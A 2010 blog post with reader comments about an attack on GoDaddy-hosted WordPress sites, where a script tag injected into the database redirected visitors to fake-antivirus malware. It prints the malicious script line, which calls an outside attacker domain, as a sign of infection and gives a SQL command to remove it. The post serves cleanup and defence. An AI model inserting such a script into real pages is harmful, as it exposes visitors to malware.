GoDaddy Targetted Once Again – WordPress Hacked
GoDaddy is perhaps the favorite target of hackers these days because of their size and their delightful tendency not to keep their security correctly enforced.
Beginning approximately December 21st, 2010 WordPress sites on GoDaddy (And GoDaddy Resellers) were again attacked and compromised.
Rather than the usual code injection attacks that are all too common but generally not hard to clean up, this attack inserted data into the database.
Signs & Symptoms
For infected sites, the homepage looks unaffected, but opening any post caused the visitor to be redirected to one of the many notorious “Fake Antivirus” sites (that are themselves viruses).
Not cool!
You can find out if your site is infected by going to your dashboard, opening any of your post’s in HTML view, and scrolling to the bottom. If you see this, you’re affected:
<script src=”http://acrossuniverseitbenet.com/js.php?kk=10″></script>
(Please don’t go opening that link)
I’ve been monitoring the attack and helping with cleanups since December 22nd.
CleanUp Routine
Because this is not a typical code injection attack – it does not call for the usual overlay upgrade that we use to clear that type.
If your site is currently infected, the first step you want to do is to notify GoDaddy of the infection so that they can run their own script against your site when they get to you in line.
However, most of us want our sites up faster than a host that is trying to clean up thousands can accommodate so here’s your next steps…
Steps
You have to remove these malicious entries from each and every post of an infected site.
While it’s long and tedious the average blogger can do this themselves, re-saving each post after they remove the infected script.
For those comfortable with it however, there is a much faster way to clean up these sites.
Step 1: Put your blog into maintenance mode so your visitors and search engines don’t get to the redirected page. There are a dozen maintenance mode plugins in the search, most are about as good as the next for this, just find a highly ranked one that supports WP 3.0. Do this step even if you do not have time to clean up the site immediately.
Step 2: Now we need to access your site’s database. This can either be done from the hosting access to the database or using a plugin called WP-phpMyAdmin.
Step 3: If using the plugin, go into Tools -> phpMyAdmin. Click on SQL in the top menu of the plugin interface. Run this SQL command:
UPDATE wp_posts SET post_content = replace(post_content,’<script src=”http://acrossuniverseitbenet.com/js.php?kk=10″></script>’,””)
Step 4: Re-check a few posts to be sure they are clear of the script code. Assuming they look good (and they should) then you are safe to deactivate the maintenance mode plugin.
Step 5: Consider whether hosting with GoDaddy and continuing to deal with WordPress related malware and setting issues remains a viable solution for your site. I highly prefer, recommend and affiliate for HostGator hosting.
Please do not skip the stop of contacting GoDaddy as they still need to do a check from there level to ensure they solve HOW they left you vulnerable.
Thanks
Special thanks to Sucuri for sounding the original alarm and to HowToMakeMyBlog for the plugin suggestion that makes this easy for the average user to fix themselves.
Summary
I know that Christmas is not a day you want to deal with this type of headache (is there ever really a day?) but please be sure to give your site a quick check to ensure you do not leave it sitting infected all weekend as the SEO and credibility impacts would be painful.
There is some additional discussion and questions about this attack going on on my Facebook thread where I announced this issue on Thursday. Please give it a read if you’re looking for a quick answer but I do not suggest replying there as I will not get notifications you have commented and will not be able to follow up with you there.
Have a Happy, Prosperous and SAFE Holidays!
Kimberly
PS: As usual, if you need help, let me know!
Keep up with all the latest social marketing changes and news to accelerate your business!
- WordPress, Facebook, Twitter, & Google+
- Social Marketing
- List Building & Affiliate Marketing
Related posts by Kim:
- GoDaddy, WordPress, Hacking & Backups, Oh My!
- How To Upgrade WordPress With Less Risk!
- Must Know Information Before The New Version Of WordPress Arrives
- How To Enable Threaded Comments In WordPress
- WordPress Plugin Review: Akismet (Anti-Spam)
Article by Kim Castleberry
Subscribe to feed via RSS or EMAIL to receive our Newsletter full of articles, tips, reviews and helpful products for your business!
Subscribe to our You tube channel
{ 8 comments… read them below or add one }
Hello Kim and All,
Just a quick thing about installing open source software, the most common initial security missed by most people, that makes it easier for hackers to compromise your install.
1. Installing to the DEFAULT location.
Running a home development server myself that I sometimes open to the internet, I can tell you from personal experience, looking at my access logs, that once an IP is found, the FIRST thing a hacker will do is run a script checking for the most COMMON default software installation paths. I know about a month ago, I had one hit my server here at home and they ran every default install pathway of PHPMyadmin from around 1.5 through the present at 2.x. ALWAYS ALWAYS ALWAYS install to a different folder, and make that folder somewhat obscure in name if you can.
2. Leaving the default table prefixes during install.
Once again, this is yet ANOTHER very bad idea because it gives the hackers another piece of information to compromise your software. By changing the default table prefixes, in the software that allows it, you take one of those pieces of information away from them. It’s an easy way to add another “pseudo security” layer like 1 above.
3. Leaving admin pages at default names if software allows you to change them.
Once again, in past experience, and I can’t speak for WordPress, but other software I’ve installed on sites did allow for renaming the admin index page to something other than admin.php. If you have the option, always do this as well.
Anyways, those are just three common things from the top of my head that I can think of to make the script kiddies lives just a bit more difficult. However, the bottom line is simple. If they are good and they want in, eventually, they will find a way. Most of that has to do with the target’s prominence and whether or not they feel the information within the database holds any potential value. The more reputable you have, the more visitors you have, the more chances you could become a target.
Forgot in the last post. One other REALLY important one is choosing your theme. Although many open source software solutions have a wealth of templates and well meaning community members, if the theme developer failed to code the theme for security, then that will potentially open up your software to injection and other nasty hack attempts. One of the biggest thing to look for in themes, which most who develop them not practicing secure coding will not even be able to answer the following, is to find out of the theme code “sanitizes” form data. Another form of “sanitizing” code is through internal code that links URL’s as well. You know, those auto generated links on your WordPress blog? Core code should “sanitize” and remove potential injection attacks through links entered in the browser window as well.
The two biggest vulnerability points to any online website are URL injection and database injection. Through “sanitizing” comment forms, email forms, list building forms, URL links, etc., through the code, it lessens the chance for such hacking attacks against your website. Just some brief security 101 for the readers here at Just Ask Kim.
Another way to attack sites is through cross scripting attempts. This is a situation where a person uploads code to another site that then does the above through the code on another site instead of directly on your site, through the url or the forms. Again, core software code, that blocks all code outside of the software needed code parameters, within your install, is a good front line to preventing such attacks. I can’t speak so much for WordPress, maybe Kim can.
Oh my I had no idea GoDaddy was so vulnerable. let me see I don’t have anything hosted on their servers. Matter of fact i only have 4 domains purchased from them but MANY purchased from one of their resellers.
You are providing such good info. i am really glad to have found your blog.
Greg invites you to read…earn extra income fast
Hey Greg, there is no danger in purchasing domains from GoDaddy (or resellers) only in purchasing the hosting from either. Its the hosting servers that they refuse to take care of and let get in a vulnerable state and then all their customers pay the price. Their hostings cheap until you gotta pay someone to help you clean up or waste a bunch of time doing it yourself. I’m glad to hear your hosted elsewhere! Thanks for taking the time to comment, I appreciate it
Kimberly
My site hosted by GoDaddy was one that was compromised. I immediately contacted GoDaddy and they provided no assistance and essentially told me it was up to me to keep my site safe. I am now looking at other hosting options.
Hey blkcatgal, I totally feel ya on that. They have been notoriously problematic to their customers. I highly recommend Hostgator but Bluehost/HostMonster is good too. Its a shame that GoDaddy cant take care of their servers… and can’t take care of customers when things happen. Be sure wherever you move that you select a host that is optimized for WordPress as this will give you the best long term results and stability as your site grows. Hang in there I know this has to be crazy stressful, if you need a hand with anything give me a shout.
Kim
I use Godaddy but not for hosting my website. More for just forwarding my domains to another host. I actually use a free wordpress host dreamhostapps.com. So far they are pretty good.
Hey Crystal thanks for giving me a heads’up to look into dreamhostapps they appear to likely be a WP Multi-Site install but I”m not real sure. Going to be fun to poke around and see what they’re doing. Just having your domain name with GoDaddy is no risk and I recommend them for domains as their domain management tools are very nice. Glad to hear you are probably safe
Kimberly
{ 1 trackback }